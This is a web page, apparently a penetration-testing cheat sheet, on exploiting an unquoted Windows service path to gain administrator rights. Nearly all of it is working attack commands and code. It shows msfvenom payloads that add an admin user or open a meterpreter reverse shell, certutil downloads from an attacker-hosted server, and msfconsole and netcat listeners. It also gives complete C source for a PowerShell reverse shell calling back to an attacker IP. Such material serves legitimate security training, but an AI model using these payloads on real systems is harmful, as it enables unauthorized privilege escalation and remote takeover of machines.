Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

EXPLOITING INSECURE SERVICE WITH METASPLOIT

  1. let’s create a binary to Add a User to the Administrators with msfvenom.
    msfvenom -p windows/x64/exec CMD='net localgroup Administrators [USERNAME] /add' -f exe > common.exe

  2. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
    certutil -urlcache -f http://[IP-ADRESS]:8000/common.exe common.exe

  3. Move the binary to the path C:\Program Files\Unquoted Path Service
    move common.exe "C:\Program Files\Unquoted Path Service\"

  4. Now run net start unquotedsvc on the target to execute the exploit.

    NOTE: If SeShutdownPrivilege is enabled you can reboot to have the service to restart automatically.
    shutdown /r /t 0

GENERATING REVERSE SHELL WITH MSFVENOM

  1. let’s create a reverse shell binary with msfvenom.
    msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=[ATTACKER-IP] LPORT=[PORT] -o unquotedpathservice.exe

  2. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
    certutil -urlcache -f http://[IP-ADRESS]:8000/unquotedpathservice.exe unquotedpathservice.exe

  3. Copy your reverse shell executable to path and rename it to match the first valid segment of the service unquoted path:
    copy C:\Temp\unquotedpathservice.exe "C:\Program Files\Unquoted Path Service\Common.exe"

  4. Start your listener on the attacking machine
    msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"

    NOTE: Alternatively, we can start a listener using nc:
    sudo rlwrap -cAr nc -lvnp 1338

  5. Now run net start unquotedsvc on the target Machine to execute the exploit.

    NOTE: If SeShutdownPrivilege is enabled you can reboot to have the service to restart automatically.
    shutdown /r /t 0

CREATING AN CUSTOMIZED EXPLOIT

  1. Compile the following custom executable directly on your attacker machine by copying the code into a text editor and saving it as exploit.c.

    #include <windows.h>
#include <stdio.h>

int main(){ 
    system("powershell.exe -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('[IP-ADRESS]',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
    return 0; 
}

  2. Our exploit.c file is now ready to compile. We can compile it directly on our attacker machine using mingw-w64 with the following command:
    x86_64-w64-mingw32-gcc exploit.c -o common.exe

    NOTE: If you don't have mingw-w64 installed, you can install it with:
    apt install mingw-w64

  3. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
    certutil -urlcache -f http://[IP-ADRESS]:8000/common.exe common.exe

  4. Move the binary to the path C:\Program Files\Unquoted Path Service
    move common.exe "C:\Program Files\Unquoted Path Service\"

  5. Start your listener on the attacking machine and run net start unquotedsvc on the target Machine to execute the exploit.
    sudo rlwrap -cAr nc -lvnp 1337

    NOTE: If SeShutdownPrivilege is enabled you can reboot to have the service to restart automatically.
    shutdown /r /t 0 /f